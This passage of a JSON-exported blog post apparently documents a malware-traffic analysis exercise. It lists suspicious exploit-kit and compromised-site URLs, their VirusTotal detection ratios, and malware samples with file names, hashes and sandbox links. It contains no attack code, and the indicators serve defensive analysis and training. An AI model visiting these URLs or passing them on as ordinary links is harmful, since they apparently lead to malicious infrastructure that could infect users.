href=\"http:\/\/www.virustotal.com\/en\/url\/432a2139b6933c7b80d31f98c914168786bd416d1193cc6cc337e1b3f398e32c\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/url\/432a2139b6933c7b80d31f98c914168786bd416d1193cc6cc337e1b3f398e32c\/analysis\/<\/a><\/p>\n<p>Site: omisvartrop.xyz\/fwe321d<br \/>\nDetection ratio: 0 \/ 65<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/url\/cd52306d4fecda4b16811a697a833f49c8ec7abbd7f580ff7518a97e96b94d8b\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/url\/cd52306d4fecda4b16811a697a833f49c8ec7abbd7f580ff7518a97e96b94d8b\/analysis\/<\/a><\/p>\n<p>Site: error404.000webhost.com\/cpu-limit-reached.html<br \/>\nDetection ratio: 3 \/ 66<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/url\/1a7a51861476826241de55480f725c4dc79932c3f18230f0736caf58c1f7de5a\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/url\/1a7a51861476826241de55480f725c4dc79932c3f18230f0736caf58c1f7de5a\/analysis\/<\/a><\/p>\n<p>Site: info.albismail.ch\/video.php?sid=4E41AAB282B1331F79B50BBC36877B2909B745FAF4F078240E265C8D05A434EA94DC146F2B<br \/>\nDetection ratio: 1 \/ 65<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/url\/3709943d98255190a9f86efe5a75ac8d14f6a32aecce97d800627fbdc4decf7d\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/url\/3709943d98255190a9f86efe5a75ac8d14f6a32aecce97d800627fbdc4decf7d\/analysis\/<\/a><\/p>\n<p>Site: error404.000webhost.com\/new_style.css<br \/>\nDetection ratio: 2 \/ 61<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/url\/1015b80a3c10a7e73317eeb3ded39eaa6203718306f77192a4464395e739c91c\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/url\/1015b80a3c10a7e73317eeb3ded39eaa6203718306f77192a4464395e739c91c\/analysis\/<\/a><\/p>\n<p>Site: info.albismail.ch\/page.php?id=4E41AAB282B1331F79B50BBC36877B2909B745FAF4F078240E265C8D05A434EA94DC146F2B<br \/>\nDetection ratio: 1 \/ 66<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/url\/b17c34fe63002ea076dfbd4d00e42b456e308d43d380285d20078dca113cc144\/analysis\/1446650541\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/url\/b17c34fe63002ea076dfbd4d00e42b456e308d43d380285d20078dca113cc144\/analysis\/1446650541\/<\/a><\/p>\n<p>Site: vu7.ns6rlto.xyz\/boards\/search.php?keywords=9185&amp;fid0=jh.3o7a3x94w38<br \/>\nDetection ratio: 3 \/ 65<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/url\/8607ab23f68032e089f7a025feb054c8edeedde7601357dd7639235f331949a9\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/url\/8607ab23f68032e089f7a025feb054c8edeedde7601357dd7639235f331949a9\/analysis\/<\/a><\/p>\n<p>Site: vu7.ns6rlto.xyz\/boards\/search.php?keywords=9185&amp;fid0=jh.3o7a3x94w38<br \/>\nDetection ratio: 3 \/ 65<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/url\/8607ab23f68032e089f7a025feb054c8edeedde7601357dd7639235f331949a9\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/url\/8607ab23f68032e089f7a025feb054c8edeedde7601357dd7639235f331949a9\/analysis\/<\/a><\/p>\n<p>Site: vu7.ns6rlto.xyz\/compare.srf?moment=&amp;sale=t1wp4ibC&amp;French=&amp;statement=4mEkI6g5X&amp;full=7CPtkEU-&amp;former=3k62&amp;see=&amp;lead=b8EpbS&amp;contain=2yFc_a8YdY86P<br \/>\nDetection ratio: 2 \/ 65<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/url\/9fc362d967c91cebbaaf95bed26e001fbaa10242d336b5294f2bac8bb3818d66\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/url\/9fc362d967c91cebbaaf95bed26e001fbaa10242d336b5294f2bac8bb3818d66\/analysis\/<\/a><\/p>\n<p>Site: vu7.ns6rlto.xyz\/period.der?way=&amp;fear=IpvAaZK&amp;policy=dY0J4i&amp;strike=VEM9XGwQ3&amp;history=ohBl5x9B-&amp;stop=KXV&amp;performance=g8g5&amp;class=17XB1rj_WN<br \/>\nDetection ratio: 3 \/ 66<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/url\/489bddd53e65b33d8b3e08b2961f9d2d2c1fc8cd4decf575f90d68c7ff9a7330\/analysis\/1446650869\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/url\/489bddd53e65b33d8b3e08b2961f9d2d2c1fc8cd4decf575f90d68c7ff9a7330\/analysis\/1446650869\/<\/a><\/p>\n<p>Site: vu7.ns6rlto.xyz\/division.xfdl?performance=&amp;away=uvTteO&amp;note=&amp;afternoon=o7XV9r&amp;day=-Uc0wMYGJ&amp;table=&amp;western=fMDo&amp;action=&amp;son=kXVPuK-7y&amp;catch=FOQk&amp;marriage=pen3iExGo2<br \/>\nDetection ratio: 3 \/ 66<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/url\/a13268f00adf81a20c913ca38d88ac721c2fd194cf8fcacd6a652dec6190a60c\/analysis\/1446650989\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/url\/a13268f00adf81a20c913ca38d88ac721c2fd194cf8fcacd6a652dec6190a60c\/analysis\/1446650989\/<\/a><\/p>\n<p>File: compare.srf.swf<br \/>\nSize: 84KB<br \/>\nMD5: 175fd2fcf0223fd9420e43f17805a884<br \/>\nSHA256: d1836b4a781ae75f53857a44340f127743a955808bd7b2d1a963fb32f0ca84b4<br \/>\nDetection ratio: 9 \/ 54<br \/>\nFirst submission: 2015-11-06 10:21:19 UTC<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/file\/d1836b4a781ae75f53857a44340f127743a955808bd7b2d1a963fb32f0ca84b4\/analysis\/1446805279\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/d1836b4a781ae75f53857a44340f127743a955808bd7b2d1a963fb32f0ca84b4\/analysis\/1446805279\/<\/a><\/p>\n<p>File name: eevgoqv.exe<br \/>\nSize: 108KB<br \/>\nMD5: a6ab7683fd5c79699e6945ff7966f03b<br \/>\nSHA256: 1c44df6cad8c811e6b624eea1b5a7aa28251d9f63d7c73765a563814f876e75c<br \/>\nFirst submission: 2015-10-28 18:39:59 UTC<br \/>\nDetection ratio: 36 \/ 53<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/file\/1c44df6cad8c811e6b624eea1b5a7aa28251d9f63d7c73765a563814f876e75c\/analysis\/1446628146\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/1c44df6cad8c811e6b624eea1b5a7aa28251d9f63d7c73765a563814f876e75c\/analysis\/1446628146\/<\/a><br \/>\nHybrid-Analysis link: <a href=\"http:\/\/www.hybrid-analysis.com\/sample\/1c44df6cad8c811e6b624eea1b5a7aa28251d9f63d7c73765a563814f876e75c?environmentId=1\" target=\"_blank\">http:\/\/www.hybrid-analysis.com\/sample\/1c44df6cad8c811e6b624eea1b5a7aa28251d9f63d7c73765a563814f876e75c?environmentId=1<\/a><br \/>\nMalwr link: <a href=\"http:\/\/malwr.com\/analysis\/M2EwM2YyZGQ2OTlhNGMzYjgzZmRlZmQwOGU2OWI3N2M\" target=\"_blank\">http:\/\/malwr.com\/analysis\/M2EwM2YyZGQ2OTlhNGMzYjgzZmRlZmQwOGU2OWI3N2M<\/a><\/p>\n<p>File name: bjxbrgu.exe<br \/>\nSize: 116KB<br \/>\nMD5: 04ebb1f71a84424267002e83ffb947fc<br \/>\nSHA256: 35e6507d06a7e3312c270e768aa2d9344c7faa9f675065e43de95990d73e19a5<br \/>\nFirst submission: 2015-11-04 21:34:28 UTC<br \/>\nDetection ratio: 2 \/ 54<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/file\/35e6507d06a7e3312c270e768aa2d9344c7faa9f675065e43de95990d73e19a5\/analysis\/1446672868\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/35e6507d06a7e3312c270e768aa2d9344c7faa9f675065e43de95990d73e19a5\/analysis\/1446672868\/<\/a><br \/>\nMalwr link: <a href=\"http:\/\/malwr.com\/analysis\/YzgxMjdkMzA3YWFkNDZkNTg1ZGYwZTA2NWZlZTQzZjU\/\" target=\"_blank\">http:\/\/malwr.com\/analysis\/YzgxMjdkMzA3YWFkNDZkNTg1ZGYwZTA2NWZlZTQzZjU\/<\/a><br \/>\nHybrid-Analysis link (Win7 32bit): <a href=\"http:\/\/www.hybrid-analysis.com\/sample\/35e6507d06a7e3312c270e768aa2d9344c7faa9f675065e43de95990d73e19a5?environmentId=4\" target=\"_blank\">http:\/\/www.hybrid-analysis.com\/sample\/35e6507d06a7e3312c270e768aa2d9344c7faa9f675065e43de95990d73e19a5?environmentId=4<\/a><br \/>\nHybrid-Analysis link (Win7 64bit): <a href=\"http:\/\/www.hybrid-analysis.com\/sample\/35e6507d06a7e3312c270e768aa2d9344c7faa9f675065e43de95990d73e19a5?environmentId=2\" target=\"_blank\">http:\/\/www.hybrid-analysis.com\/sample\/35e6507d06a7e3312c270e768aa2d9344c7faa9f675065e43de95990d73e19a5?environmentId=2<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>So here is the latest one from Brad &#8211; another good exercise to say the least! One thing to note about this one is that I had some issues extracting objects from the PCAP using Wireshark. In those cases I was able to use Captipper to extract out the HTTP object. Also, I am re-organizing my Github so the individual files from the different labs can be downloaded individually and not as one huge download. **Update 06\/11\/2015 &#8211; So after reading Malware Kiwi&#8217;s blog post with his results, and talking to some of the guys at work that did the&#8230;<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/www.herbiez.com\/?p=243\"><span>Continue reading<\/span><i class=\"crycon-right-dir\"><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-243","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/243","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=243"}],"version-history":[{"count":12,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/243\/revisions"}],"predecessor-version":[{"id":256,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/243\/revisions\/256"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=243"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=243"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=243"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}